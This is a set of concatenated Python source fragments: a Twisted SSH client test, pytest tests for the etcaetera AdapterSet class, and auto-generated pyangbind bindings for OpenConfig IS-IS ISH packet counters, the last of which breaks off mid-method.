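    flag = '\x01' if core_dumped else '\x00'
    return common.NS(signal_name) + flag + common.NS('') + common.NS('')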
class SSHSessionClientTestCase(unittest.TestCase):
"""
SSHSessionClient is an obsolete class used to connect standard IO to
an SSHSession.
"""
def test_dataReceived(self):
"""
When data is received, it should be sent to the transport.
"""
client = session.SSHSessionClient()
client.transport = StubTransport()
client.dataReceived('test data')
self.assertEquals(client.transport.buf, 'test data')
|
|
import pytest
from etcaetera.adapter import *
class TestAdapterSet:
def test_set_defaults_to_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.defaults = 123
def test_set_overrides_to_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.overrides = "123"
def test_setitem_using_a_defaults_pointing_other_than_first_index_raises(self):
s = AdapterSet(Env(), Overrides())
with pytest.raises(IndexError):
s[1] = Defaults()
def test_setitem_using_an_overrides_pointing_other_than_last_index_raises(self):
s = AdapterSet(Defaults(), Env())
with pytest.raises(IndexError):
s[0] = Overrides()
def test__set_defaults_with_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.defaults = 123
def test__set_defaults_of_empty_adapters_set(self):
s = AdapterSet()
s.defaults = Defaults()
assert isinstance(s[0], Defaults) is True
def test__set_defaults_of_non_empty_adapters_set_puts_it_first(self):
s = AdapterSet(Env())
s.defaults = Defaults()
assert isinstance(s[0], Defaults) is True
def test__set_defaults_using_a_dict(self):
s = AdapterSet(Env())
s.defaults = {"abc": "123"}
assert isinstance(s[0], Defaults) is True
assert isinstance(s.defaults, Defaults) is True
assert s.defaults.data == {"ABC": "123"}
def test__set_overrides_with_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.overrides = 123
def test__set_overrides_of_empty_adapters_set(self):
s = AdapterSet()
s.overrides = Overrides()
assert isinstance(s[0], Overrides) is True
def test__set_overrides_of_non_empty_adapters_set_puts_it_last(self):
s = AdapterSet(Env())
s.overrides = Overrides()
assert isinstance(s[1], Overrides) is True
def test__set_overrides_using_a_dict(self):
s = AdapterSet(Env())
s.overrides = {"abc": "123"}
assert isinstance(s[1], Overrides) is True
assert isinstance(s.overrides, Overrides) is True
assert s.overrides.data == {"ABC": "123"}
def test_init_with_invalid_adapters_raises(self):
with pytest.raises(TypeError):
AdapterSet(123, "abc")
def test_init_with_defaults_not_being_first_raises(self):
defaults_adapter = Defaults({"abc": "123"})
env_adapter = Env()
with pytest.raises(ValueError):
AdapterSet(env_adapter, defaults_adapter)
def test_init_with_multiple_defaults_raises(self):
defaults_adapter = Defaults({"abc": "123"})
with pytest.raises(ValueError):
AdapterSet(defaults_adapter, defaults_adapter)
def test_init_with_overrides_not_being_last_raises(self):
overrides_adapter = Overrides({"abc": "123"})
env_adapter = Env()
with pytest.raises(ValueError):
AdapterSet(overrides_adapter, env_adapter)
def test_init_with_multiple_overrides_raises(self):
overrides_adapter = Overrides({"abc": "123"})
with pytest.raises(ValueError):
AdapterSet(overrides_adapter, overrides_adapter)
def test_init_adapters_order_is_protected(self):
first_env_adapter = Env()
second_env_adapter = Env()
defaults_adapter = Defaults()
overrides_adapter = Overrides()
s = AdapterSet(
defaults_adapter,
first_env_adapter,
second_env_adapter,
overrides_adapter
)
assert len(s) == 4
assert isinstance(s[0], Defaults) and s[0] == defaults_adapter
assert isinstance(s[1], Env) and s[1] == first_env_adapter
assert isinstance(s[2], Env) and s[2] == second_env_adapter
assert isinstance(s[3], Overrides) and s[3] == overrides_adapter
def test_appendleft_raises_when_provided_with_non_adapter(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.appendleft(123)
def test_appendleft_raises_when_providing_a_second_defaults(self):
s = AdapterSet(Defaults())
with pytest.raises(ValueError):
s.appendleft(Defaults())
def test_appendleft_raises_when_providing_a_second_overrides(self):
s = AdapterSet(Overrides())
with pytest.raises(ValueError):
s.appendleft(Overrides())
def test_appendleft_sets_defaults_property(self):
s = AdapterSet(Env(), Env())
assert s.defaults is None
s.appendleft(Defaults())
assert s.defaults is not None
def test_appendleft_sets_overrides_property(self):
s = AdapterSet(Env(), Env())
assert s.overrides is None
s.appendleft(Overrides())
assert s.overrides is not None
def test_append_raises_when_provided_with_non_adapter(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.append(123)
def test_append_raises_when_providing_a_second_defaults(self):
s = AdapterSet(Defaults())
with pytest.raises(ValueError):
s.append(Defaults())
def test_append_raises_when_providing_a_second_overrides(self):
s = AdapterSet(Overrides())
with pytest.raises(ValueError):
s.append(Overrides())
def test_append_sets_defaults_property(self):
s = AdapterSet(Env(), Env())
assert s.defaults is None
s.append(Defaults())
assert s.defaults is not None
def test_append_sets_overrides_property(self):
s = AdapterSet(Env(), Env())
assert s.overrides is None
s.append(Overrides())
assert s.overrides is not None
def test_insert_at_negative_index_raises(self):
s = AdapterSet()
with pytest.raises(IndexError):
s.insert(-1, Env())
def test_insert_invalid_type_raises(self):
s = AdapterSet()
with pytest.raises(TypeError):
s.insert(0, 123)
def test_insert_a_second_defaults_at_first_index_raises(self):
s = AdapterSet(Defaults())
with pytest.raises(ValueError):
s.insert(0, Defaults())
def test_insert_a_second_overrides_at_last_index_raises(self):
s = AdapterSet(Defaults(), Env(), Overrides())
with pytest.raises(ValueError):
s.insert(3, Overrides())
def test_insert_in_the_middle(self):
s = AdapterSet(Defaults(), Overrides())
s.insert(1, Env())
assert len(s) == 3
assert isinstance(s[1], Env)
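# A minimal usage sketch, not part of the original test suite: it assumes only
# the AdapterSet behaviour exercised above -- a single Defaults adapter must
# come first, a single Overrides adapter must come last, and any number of
# other adapters (here Env) sit in between.
def _example_adapter_set():
    s = AdapterSet(Defaults({"abc": "123"}), Env(), Overrides({"abc": "456"}))
    assert isinstance(s.defaults, Defaults)
    assert isinstance(s.overrides, Overrides)
    return s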
|
|
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improvement)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/levels/level/packet-counters/ish/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state relating to ISH PDUs.
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__received",
"__processed",
"__dropped",
"__sent",
"__retransmit",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"levels",
"level",
"packet-counters",
"ish",
"state",
]
def _get_received(self):
"""
Getter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface.
"""
return self.__received
def _set_received(self, v, load=False):
"""
Setter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_received is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_received() directly.
YANG Description: The number of the specified type of PDU received on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """received must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="received", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__received = t
if hasattr(self, "_set"):
self._set()
def _unset_received(self):
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_processed(self):
"""
Getter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
return self.__processed
def _set_processed(self, v, load=False):
"""
Setter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_processed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_processed() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """processed must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="processed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__processed = t
if hasattr(self, "_set"):
self._set()
def _unset_processed(self):
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_dropped(self):
"""
Getter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
return self.__dropped
def _set_dropped(self, v, load=False):
"""
Setter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_dropped is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dropped() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """dropped must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__dropped = t
if hasattr(self, "_set"):
self._set()
def _unset_dropped(self):
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_sent(self):
"""
Getter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
return self.__sent
def _set_sent(self, v, load=False):
"""
Setter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent() directly.
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """sent must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="sent", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__sent = t
if hasattr(self, "_set"):
self._set()
def _unset_sent(self):
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_retransmit(self):
"""
Getter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
YANG Description: The number of the specified type of PDU that have been
retransmitted by the local system on the interface.
"""
return self.__retransmit
def _set_retransmit(self, v, load=False):
"""
Setter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_retransmit() directly.
YANG Description: The number of the specified type of PDU that have been
retransmitted by the local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """retransmit must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="retransmit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__retransmit = t
if hasattr(self, "_set"):
self._set()
def _unset_retransmit(self):
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
received = __builtin__.property(_get_received)
processed = __builtin__.property(_get_processed)
dropped = __builtin__.property(_get_dropped)
sent = __builtin__.property(_get_sent)
retransmit = __builtin__.property(_get_retransmit)
_pyangbind_elements = OrderedDict(
[
("received", received),
("processed", processed),
("dropped", dropped),
("sent", sent),
("retransmit", retransmit),
]
)
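# A minimal usage sketch, not part of the generated bindings: it assumes the
# conventions shown above -- these counters are config false, so user code
# reads them through the read-only properties while a backend populates them
# by calling the private _set_* methods directly.
def _example_ish_state_usage():
    s = state()
    s._set_received(10)   # a backend would call the private setter directly
    s._set_dropped(2)
    return int(s.received), int(s.dropped)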
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/levels/level/packet-counters/ish/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state relating to ISH PDUs.
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__received",
"__processed",
"__dropped",
"__sent",
"__retransmit",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"levels",
"level",
"packet-counters",
"ish",
"state",
]
def _get_received(self):
"""
Getter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface.
"""
return self.__received
def _set_received(self, v, load=False):
"""
Setter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_received is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_received() directly.
YANG Description: The number of the specified type of PDU received on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """received must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="received", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__received = t
if hasattr(self, "_set"):
self._set()
def _unset_received(self):
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_processed(self):
"""
Getter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
return self.__processed
def _set_processed(self, v, load=False):
"""
Setter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_processed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_processed() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """processed must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="processed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__processed = t
if hasattr(self, "_set"):
self._set()
def _unset_processed(self):
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_dropped(self):
"""
Getter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
return self.__dropped
def _set_dropped(self, v, load=False):
"""
Setter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_dropped is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dropped() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """dropped must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__dropped = t
if hasattr(self, "_set"):
self._set()
def _unset_dropped(self):
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_sent(self):
"""
Getter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
return self.__sent
def _set_sent(self, v, load=False):
"""
Setter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent() directly.
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
